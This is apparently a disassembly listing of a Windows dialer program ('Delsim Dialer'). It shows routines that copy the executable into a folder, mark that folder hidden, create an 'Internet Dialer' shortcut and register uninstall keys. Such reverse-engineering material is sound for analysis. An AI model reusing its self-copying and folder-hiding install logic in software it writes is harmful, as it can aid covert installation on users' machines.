loc_403931: ; CODE XREF: sub_403920+B�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_40393A: ; CODE XREF: sub_403920+F�j
mov eax, [esp+10h+arg_4]
add eax, esi
push eax ; ui
push 0 ; strIn
mov [esp+18h+var_4], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jnz short loc_40395F
pop esi
pop ebp
mov eax, 8007000Eh
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_40395F: ; CODE XREF: sub_403920+31�j
lea eax, [esi+esi]
mov esi, [ebp+0]
mov ecx, eax
push edi
mov edx, ecx
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [esp+14h+arg_4]
mov esi, [esp+14h+arg_0]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [esp+14h+var_4]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+0]
push ecx ; bstrString
call ds:SysFreeString
pop edi
mov [ebp+0], ebx
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn 8
sub_403920 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4039C0(HINSTANCE hInstance,LPCSTR lpString)
sub_4039C0 proc near ; CODE XREF: sub_4010C0+38D�p
psz = byte ptr -398h
var_198 = dword ptr -198h
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_16E = byte ptr -16Eh
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_142 = byte ptr -142h
dwDisposition = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_112 = byte ptr -112h
bstrString = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_E6 = byte ptr -0E6h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_BA = byte ptr -0BAh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = byte ptr -0ACh
var_8E = byte ptr -8Eh
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_62 = byte ptr -62h
var_60 = dword ptr -60h
lpMem = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_36 = byte ptr -36h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_A = byte ptr -0Ah
lpMultiByteStr = dword ptr -8
hKey = dword ptr -4
hInstance = dword ptr 8
lpString = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 398h
mov ecx, [ebp+hInstance]
push ebx
push esi
push edi
lea eax, [ebp+psz]
push 200h ; cchBufferMax
push eax ; lpBuffer
xor ebx, ebx
push 71h ; uID
push ecx ; hInstance
mov [ebp+var_E4], ebx
mov [ebp+var_E0], ebx
mov [ebp+var_DC], ebx
mov [ebp+var_D8], bl
mov [ebp+var_BA], bl
mov [ebp+var_16C], ebx
mov [ebp+var_168], ebx
mov [ebp+var_164], ebx
mov [ebp+var_160], bl
mov [ebp+var_142], bl
mov [ebp+bstrString], ebx
mov [ebp+var_10C], ebx
mov [ebp+var_108], ebx
mov [ebp+var_104], bl
mov [ebp+var_E6], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
cmp esi, ebx
jz short loc_403AB1
lea eax, [ebp+psz]
test eax, eax
jnz short loc_403A72
mov edi, ds:lstrlenA
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_403ABD
; ---------------------------------------------------------------------------
loc_403A72: ; CODE XREF: sub_4039C0+9B�j
mov edi, ds:lstrlenA
lea ecx, [ebp+psz]
push ecx ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
lea edx, [ebp+psz]
push esi ; cchWideChar
push edx ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_403ABD
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_4039C0+91�j
mov edi, ds:lstrlenA
mov [ebp+bstrString], ebx
loc_403ABD: ; CODE XREF: sub_4039C0+B0�j
; sub_4039C0+EF�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_403ACA
xor esi, esi
jmp short loc_403AF2
; ---------------------------------------------------------------------------
loc_403ACA: ; CODE XREF: sub_4039C0+104�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push esi ; cchWideChar
push offset MultiByteStr ; "\\"
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_403AF2: ; CODE XREF: sub_4039C0+108�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+bstrString]
call sub_403920
mov ecx, [ebp+hInstance]
push 7Ah ; bstrString
push ecx ; hInstance
lea ecx, [ebp+bstrString]
call sub_40A840
mov esi, [ebp+lpString]
mov [ebp+var_198], ebx
mov [ebp+var_194], ebx
mov [ebp+var_190], ebx
mov al, [esi]
mov [ebp+var_18C], bl
cmp al, 22h
mov [ebp+var_16E], bl
jnz short loc_403B42
inc esi
mov [ebp+lpString], esi
loc_403B42: ; CODE XREF: sub_4039C0+17C�j
mov cl, [esi]
mov eax, esi
cmp cl, bl
jz short loc_403B57
loc_403B4A: ; CODE XREF: sub_4039C0+195�j
cmp cl, 22h
jz short loc_403B57
mov cl, [eax+1]
inc eax
cmp cl, bl
jnz short loc_403B4A
loc_403B57: ; CODE XREF: sub_4039C0+188�j
; sub_4039C0+18D�j
sub eax, esi
lea ecx, [ebp+var_13C]
push eax ; int
push esi ; lpString2
mov [ebp+var_13C], ebx
mov [ebp+var_138], ebx
mov [ebp+var_134], ebx
mov [ebp+var_130], bl
mov [ebp+var_112], bl
call sub_40A350
mov eax, [ebp+hInstance]
lea edx, [ebp+psz]
push 200h ; cchBufferMax
push edx ; lpBuffer
push 7Ah ; uID
push eax ; hInstance
mov [ebp+var_B8], ebx
mov [ebp+var_B4], ebx
mov [ebp+var_B0], ebx
mov [ebp+var_AC], bl
mov [ebp+var_8E], bl
call ds:LoadStringA ; LoadStringA
mov ecx, [ebp+var_B8]
mov [ebp+lpMultiByteStr], eax
push ecx ; bstrString
call ds:SysFreeString
cmp [ebp+lpMultiByteStr], ebx
jz short loc_403C26
lea edx, [ebp+psz]
test edx, edx
jnz short loc_403BEA
xor eax, eax
push eax ; psz
call ds:SysAllocString
mov [ebp+var_B8], eax
jmp short loc_403C2C
; ---------------------------------------------------------------------------
loc_403BEA: ; CODE XREF: sub_4039C0+217�j
lea eax, [ebp+psz]
push eax ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
lea ecx, [ebp+psz]
push esi ; cchWideChar
push ecx ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
mov esi, [ebp+lpString]
push eax ; psz
call ds:SysAllocString
mov [ebp+var_B8], eax
jmp short loc_403C2C
; ---------------------------------------------------------------------------
loc_403C26: ; CODE XREF: sub_4039C0+20D�j
mov [ebp+var_B8], ebx
loc_403C2C: ; CODE XREF: sub_4039C0+228�j
; sub_4039C0+264�j
push 2Bh ; lpString
lea ecx, [ebp+var_8C]
mov [ebp+var_8C], ebx
mov [ebp+var_88], ebx
mov [ebp+var_84], ebx
mov [ebp+var_80], bl
mov [ebp+var_62], bl
call sub_40A680
cmp al, 1
jz short loc_403CCC
push 26h ; lpString
lea ecx, [ebp+var_8C]
call sub_40A680
cmp al, 1
jz short loc_403CCC
mov edx, off_40F284
mov eax, off_40F280
push edx ; lpValueName
push eax ; lpSubKey
push 80000002h ; cbData
lea ecx, [ebp+var_8C]
call sub_40A460
cmp al, 1
jz short loc_403CCC
cmp byte ptr [esi+1], 3Ah
jnz short loc_403C9D
push 3 ; int
push esi ; lpString2
lea ecx, [ebp+var_8C]
call sub_40A350
jmp short loc_403D15
; ---------------------------------------------------------------------------
loc_403C9D: ; CODE XREF: sub_4039C0+2CB�j
mov ecx, offset aC ; "c:\\"
test ecx, ecx
jnz short loc_403CAA
xor esi, esi
jmp short loc_403D01
; ---------------------------------------------------------------------------
loc_403CAA: ; CODE XREF: sub_4039C0+2E4�j
push offset aC ; "c:\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx
push esi
push offset aC ; "c:\\"
jmp short loc_403CF9
; ---------------------------------------------------------------------------
loc_403CCC: ; CODE XREF: sub_4039C0+293�j
; sub_4039C0+2A4�j ...
mov edx, offset MultiByteStr ; "\\"
test edx, edx
jnz short loc_403CD9
xor esi, esi
jmp short loc_403D01
; ---------------------------------------------------------------------------
loc_403CD9: ; CODE XREF: sub_4039C0+313�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push esi ; cchWideChar
push offset MultiByteStr ; "\\"
loc_403CF9: ; CODE XREF: sub_4039C0+30A�j
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_403D01: ; CODE XREF: sub_4039C0+2E8�j
; sub_4039C0+317�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_8C]
call sub_403920
loc_403D15: ; CODE XREF: sub_4039C0+2DB�j
mov [ebp+var_34], ebx
mov [ebp+var_30], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_28], bl
mov [ebp+var_A], bl
mov [ebp+lpString], ebx
loc_403D27: ; CODE XREF: sub_4039C0+58F�j
mov eax, [ebp+var_34]
push eax ; bstrString
call ds:SysFreeString
mov ecx, [ebp+var_8C]
mov [ebp+var_34], ebx
push ecx ; BSTR
call ds:SysStringLen
mov edx, [ebp+var_8C]
push eax
push edx
lea ecx, [ebp+var_34]
call sub_403920
mov esi, lpString
cmp esi, ebx
jnz short loc_403D5F
xor esi, esi
jmp short loc_403D85
; ---------------------------------------------------------------------------
loc_403D5F: ; CODE XREF: sub_4039C0+399�j
push esi ; lpString
call edi ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push edi ; cchWideChar
push esi ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
mov edi, ds:lstrlenA
mov esi, eax
loc_403D85: ; CODE XREF: sub_4039C0+39D�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_34]
call sub_403920
cmp [ebp+lpString], ebx
jle short loc_403DF3
mov eax, offset a_ ; "."
test eax, eax
jnz short loc_403DA8
xor esi, esi
jmp short loc_403DD6
; ---------------------------------------------------------------------------
loc_403DA8: ; CODE XREF: sub_4039C0+3E2�j
push offset a_ ; "."
call edi ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push edi ; cchWideChar
push offset a_ ; "."
push eax ; lpWideCharStr
call sub_401560
mov edi, ds:lstrlenA
mov esi, eax
loc_403DD6: ; CODE XREF: sub_4039C0+3E6�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_34]
call sub_403920
mov ecx, [ebp+lpString]
push ecx ; lpString
lea ecx, [ebp+var_34]
call sub_40A980
loc_403DF3: ; CODE XREF: sub_4039C0+3D9�j
lea ecx, [ebp+var_34]
call sub_40A2D0
mov esi, ds:GetFileAttributesA
push eax ; lpFileName
call esi ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_403E2F
lea ecx, [ebp+var_34]
call sub_40A2D0
push eax ; lpPathName
call sub_40B16E
add esp, 4
test eax, eax
jnz loc_403F45
lea ecx, [ebp+var_34]
call sub_40A2D0
push eax ; lpFileName
call esi ; GetFileAttributesA
jmp short loc_403E37
; ---------------------------------------------------------------------------
loc_403E2F: ; CODE XREF: sub_4039C0+447�j
test al, 10h
jz loc_403F45
loc_403E37: ; CODE XREF: sub_4039C0+46D�j
or al, 2
lea ecx, [ebp+var_34]
push eax ; dwFileAttributes
call sub_40A2D0
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
mov edx, offset MultiByteStr ; "\\"
test edx, edx
jnz short loc_403E56
xor esi, esi
jmp short loc_403E84
; ---------------------------------------------------------------------------
loc_403E56: ; CODE XREF: sub_4039C0+490�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push edi ; cchWideChar
push offset MultiByteStr ; "\\"
push eax ; lpWideCharStr
call sub_401560
mov edi, ds:lstrlenA
mov esi, eax
loc_403E84: ; CODE XREF: sub_4039C0+494�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_34]
call sub_403920
mov eax, [ebp+var_B8]
push eax ; BSTR
call ds:SysStringLen
mov ecx, [ebp+var_B8]
push eax
push ecx
lea ecx, [ebp+var_34]
call sub_403920
mov edx, offset a_exe ; ".exe"
test edx, edx
jnz short loc_403EBF
xor esi, esi
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403EBF: ; CODE XREF: sub_4039C0+4F9�j
push offset a_exe ; ".exe"
call edi ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push edi ; cchWideChar
push offset a_exe ; ".exe"
push eax ; lpWideCharStr
call sub_401560
mov edi, ds:lstrlenA
mov esi, eax
loc_403EED: ; CODE XREF: sub_4039C0+4FD�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_34]
call sub_403920
lea ecx, [ebp+var_13C]
call sub_40A2D0
lea ecx, [ebp+var_34]
mov esi, eax
call sub_40A2D0
push eax ; lpString2
push esi ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_403FB4
lea ecx, [ebp+var_13C]
call sub_40A2D0
push ebx ; bFailIfExists
lea ecx, [ebp+var_34]
mov esi, eax
call sub_40A2D0
push eax ; lpNewFileName
push esi ; lpExistingFileName
call ds:CopyFileA ; CopyFileA
test eax, eax
jnz short loc_403F57
loc_403F45: ; CODE XREF: sub_4039C0+45C�j
; sub_4039C0+471�j
mov eax, [ebp+lpString]
inc eax
cmp eax, 0Ah
mov [ebp+lpString], eax
jl loc_403D27
jmp short loc_403FB4
; ---------------------------------------------------------------------------
loc_403F57: ; CODE XREF: sub_4039C0+583�j
mov eax, [ebp+var_E4]
push eax ; bstrString
call ds:SysFreeString
lea ecx, [ebp+var_34]
mov [ebp+var_E4], ebx
call sub_40A2D0
cmp eax, ebx
mov [ebp+lpMultiByteStr], eax
jnz short loc_403F7D
xor esi, esi
jmp short loc_403FA0
; ---------------------------------------------------------------------------
loc_403F7D: ; CODE XREF: sub_4039C0+5B7�j
push eax ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ecx, [ebp+lpMultiByteStr]
mov eax, esp
push ebx ; CodePage
push esi ; cchWideChar
push ecx ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_403FA0: ; CODE XREF: sub_4039C0+5BB�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_E4]
call sub_403920
loc_403FB4: ; CODE XREF: sub_4039C0+55D�j
; sub_4039C0+595�j
cmp [ebp+lpString], 9
jle short loc_403FE4
mov edx, [ebp+var_34]
push edx ; bstrString
call ds:SysFreeString
mov eax, [ebp+var_13C]
mov [ebp+var_34], ebx
push eax ; BSTR
call ds:SysStringLen
mov ecx, [ebp+var_13C]
push eax
push ecx
lea ecx, [ebp+var_34]
call sub_403920
loc_403FE4: ; CODE XREF: sub_4039C0+5F8�j
push 16h ; lpString
lea ecx, [ebp+var_60]
mov [ebp+var_60], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_58], ebx
mov [ebp+var_54], bl
mov [ebp+var_36], bl
call sub_40A680
cmp al, 1
jz short loc_40402C
push 0Bh ; lpString
lea ecx, [ebp+var_60]
call sub_40A680
cmp al, 1
jz short loc_40402C
mov edx, off_40F268
mov eax, off_40F260
push edx ; lpValueName
push eax ; lpSubKey
lea ecx, [ebp+var_60]
call sub_40A600
cmp al, 1
jnz loc_404144
loc_40402C: ; CODE XREF: sub_4039C0+63F�j
; sub_4039C0+64D�j
mov ecx, offset MultiByteStr ; "\\"
test ecx, ecx
jnz short loc_404039
xor esi, esi
jmp short loc_404061
; ---------------------------------------------------------------------------
loc_404039: ; CODE XREF: sub_4039C0+673�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push esi ; cchWideChar
push offset MultiByteStr ; "\\"
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_404061: ; CODE XREF: sub_4039C0+677�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_60]
call sub_403920
mov edx, [ebp+var_B8]
push edx ; BSTR
call ds:SysStringLen
push eax
mov eax, [ebp+var_B8]
push eax
lea ecx, [ebp+var_60]
call sub_403920
mov ecx, offset a_lnk ; ".lnk"
test ecx, ecx
jnz short loc_40409C
xor esi, esi
jmp short loc_4040C4
; ---------------------------------------------------------------------------
loc_40409C: ; CODE XREF: sub_4039C0+6D6�j
push offset a_lnk ; ".lnk"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push esi ; cchWideChar
push offset a_lnk ; ".lnk"
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_4040C4: ; CODE XREF: sub_4039C0+6DA�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_60]
call sub_403920
push offset aInternetDialer ; "Internet Dialer"
lea ecx, [ebp+var_34]
call sub_40A2D0
push eax
lea ecx, [ebp+var_60]
call sub_40ACD0
mov edx, [ebp+var_16C]
push edx ; bstrString
call ds:SysFreeString
lea ecx, [ebp+var_60]
mov [ebp+var_16C], ebx
call sub_40A2D0
mov esi, eax
cmp esi, ebx
jnz short loc_404110
xor esi, esi
jmp short loc_404130
; ---------------------------------------------------------------------------
loc_404110: ; CODE XREF: sub_4039C0+74A�j
push esi ; lpString
call edi ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push edi ; cchWideChar
push esi ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_404130: ; CODE XREF: sub_4039C0+74E�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+var_16C]
call sub_403920
loc_404144: ; CODE XREF: sub_4039C0+666�j
cmp ds:byte_40D71A, bl
jz short loc_404172
lea ecx, [ebp+var_E4]
call sub_40A2D0
lea ecx, [ebp+var_16C]
mov esi, eax
call sub_40A2D0
push eax ; int
mov eax, [ebp+hInstance]
push esi ; lpData
push eax ; hInstance
call sub_404320
add esp, 0Ch
loc_404172: ; CODE XREF: sub_4039C0+78A�j
lea ecx, [ebp+dwDisposition]
lea edx, [ebp+hKey]
push ecx ; lpdwDisposition
push edx ; phkResult
push ebx ; lpSecurityAttributes
push 0F003Fh ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
push offset SubKey ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
mov [ebp+hKey], ebx
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jnz loc_404248
mov edi, offset Data ; "Delsim Dialer"
or ecx, 0FFFFFFFFh
repne scasb
mov eax, [ebp+hKey]
mov esi, ds:RegSetValueExA
not ecx
dec ecx
push ecx ; cbData
push offset Data ; "Delsim Dialer"
push 1 ; dwType
push ebx ; Reserved
push offset aDisplayname ; "DisplayName"
push eax ; hKey
call esi ; RegSetValueExA
mov ecx, offset aU ; " -u"
test ecx, ecx
jnz short loc_4041D5
xor edi, edi
jmp short loc_404201
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4039C0+80F�j
push offset aU ; " -u"
call ds:lstrlenA ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push edi ; cchWideChar
push offset aU ; " -u"
push eax ; lpWideCharStr
call sub_401560
mov edi, eax
loc_404201: ; CODE XREF: sub_4039C0+813�j
push edi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push edi
lea ecx, [ebp+var_E4]
call sub_403920
lea ecx, [ebp+var_E4]
call sub_40A2D0
mov edx, eax
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx ; cbData
push edx ; lpData
mov edx, [ebp+hKey]
push 1 ; dwType
push ebx ; Reserved
push offset aUninstallstrin ; "UninstallString"
push edx ; hKey
call esi ; RegSetValueExA
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_404248: ; CODE XREF: sub_4039C0+7DB�j
push ebx ; dwItem2
push ebx ; dwItem1
push ebx ; uFlags
push 7FFFFFFFh ; wEventId
call ds:SHChangeNotify ; SHChangeNotify
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_404269
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_404269: ; CODE XREF: sub_4039C0+89B�j
mov ecx, [ebp+var_60]
mov esi, ds:SysFreeString
push ecx ; bstrString
call esi ; SysFreeString
mov eax, [ebp+var_30]
cmp eax, ebx
jz short loc_404288
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_30], ebx
loc_404288: ; CODE XREF: sub_4039C0+8BA�j
mov edx, [ebp+var_34]
push edx ; bstrString
call esi ; SysFreeString
lea ecx, [ebp+var_8C]
call sub_4042F0
lea ecx, [ebp+var_B8]
call sub_4042F0
lea ecx, [ebp+var_13C]
call sub_4042F0
lea ecx, [ebp+var_198]
call sub_4042F0
lea ecx, [ebp+bstrString]
call sub_4042F0
lea ecx, [ebp+var_16C]
call sub_4042F0
lea ecx, [ebp+var_E4]
call sub_4042F0
lea esp, [ebp-3A4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4039C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4042F0 proc near ; CODE XREF: sub_4039C0+8D4�p
; sub_4039C0+8DF�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
jz short loc_40430A
push eax ; lpMem
call sub_40AF10
add esp, 4
mov dword ptr [esi+4], 0
loc_40430A: ; CODE XREF: sub_4042F0+8�j
mov eax, [esi]
push eax ; bstrString
call ds:SysFreeString
pop esi
retn
sub_4042F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404320(HINSTANCE hInstance,BYTE *lpData,int)
sub_404320 proc near ; CODE XREF: sub_4039C0+7AA�p
psz = byte ptr -240h
dwDisposition = dword ptr -40h
bstrString = dword ptr -3Ch
lpMem = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
hKey = dword ptr -8
lpString = dword ptr -4
hInstance = dword ptr 8
lpData = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 240h
mov ecx, [ebp+hInstance]
push ebx
push esi
push edi
lea eax, [ebp+psz]
push 200h ; cchBufferMax
push eax ; lpBuffer
xor ebx, ebx
push 71h ; uID
push ecx ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], bl
mov [ebp+var_12], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
mov edi, ds:lstrlenA
cmp esi, ebx
jz short loc_4043C6
lea eax, [ebp+psz]
test eax, eax
jnz short loc_404381
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_4043C9
; ---------------------------------------------------------------------------
loc_404381: ; CODE XREF: sub_404320+53�j
lea ecx, [ebp+psz]
push ecx ; lpString
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, ebx
xor ebx, ebx
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_4043C9
; ---------------------------------------------------------------------------
loc_4043C6: ; CODE XREF: sub_404320+49�j
mov [ebp+bstrString], ebx
loc_4043C9: ; CODE XREF: sub_404320+5F�j
; sub_404320+A4�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_4043D7
mov [ebp+lpString], ebx
jmp short loc_40440D
; ---------------------------------------------------------------------------
loc_4043D7: ; CODE XREF: sub_404320+B0�j
push offset MultiByteStr ; "\\"
call edi ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], ebx
xor ebx, ebx
loc_40440D: ; CODE XREF: sub_404320+B5�j
mov ecx, [ebp+lpString]
push ecx ; lpString
call ds:lstrlenW ; lstrlenW
mov edi, eax
mov eax, [ebp+bstrString]
cmp eax, ebx
mov [ebp+var_10], edi
jnz short loc_404427
xor esi, esi
jmp short loc_404430
; ---------------------------------------------------------------------------
loc_404427: ; CODE XREF: sub_404320+101�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_404430: ; CODE XREF: sub_404320+105�j
lea eax, [esi+edi]
push eax ; ui
push ebx ; strIn
mov [ebp+var_C], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40448B
lea eax, [esi+esi]
mov esi, [ebp+bstrString]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_10]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_C]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov word ptr [ebx+eax*2], 0
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov [ebp+bstrString], ebx
loc_40448B: ; CODE XREF: sub_404320+122�j
mov edx, [ebp+hInstance]
push 7Ah ; bstrString
push edx ; hInstance
lea ecx, [ebp+bstrString]
call sub_40A840
lea eax, [ebp+dwDisposition]
lea ecx, [ebp+hKey]
push eax ; lpdwDisposition
push ecx ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
lea ecx, [ebp+bstrString]
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
test eax, eax
jnz short loc_404512
mov edx, [ebp+lpData]
or ecx, 0FFFFFFFFh
mov edi, edx
mov esi, ds:RegSetValueExA
repne scasb
not ecx
dec ecx
push ecx ; cbData
push edx ; lpData
mov edx, [ebp+hKey]
push 1 ; dwType
push eax ; Reserved
push offset ValueName ; "uninstExe"
push edx ; hKey
call esi ; RegSetValueExA
mov edx, [ebp+arg_8]
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx ; cbData
push edx ; lpData
push 1 ; dwType
push eax ; Reserved
mov eax, [ebp+hKey]
push offset aUninstshortcut ; "uninstShortcut"
push eax ; hKey
call esi ; RegSetValueExA
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
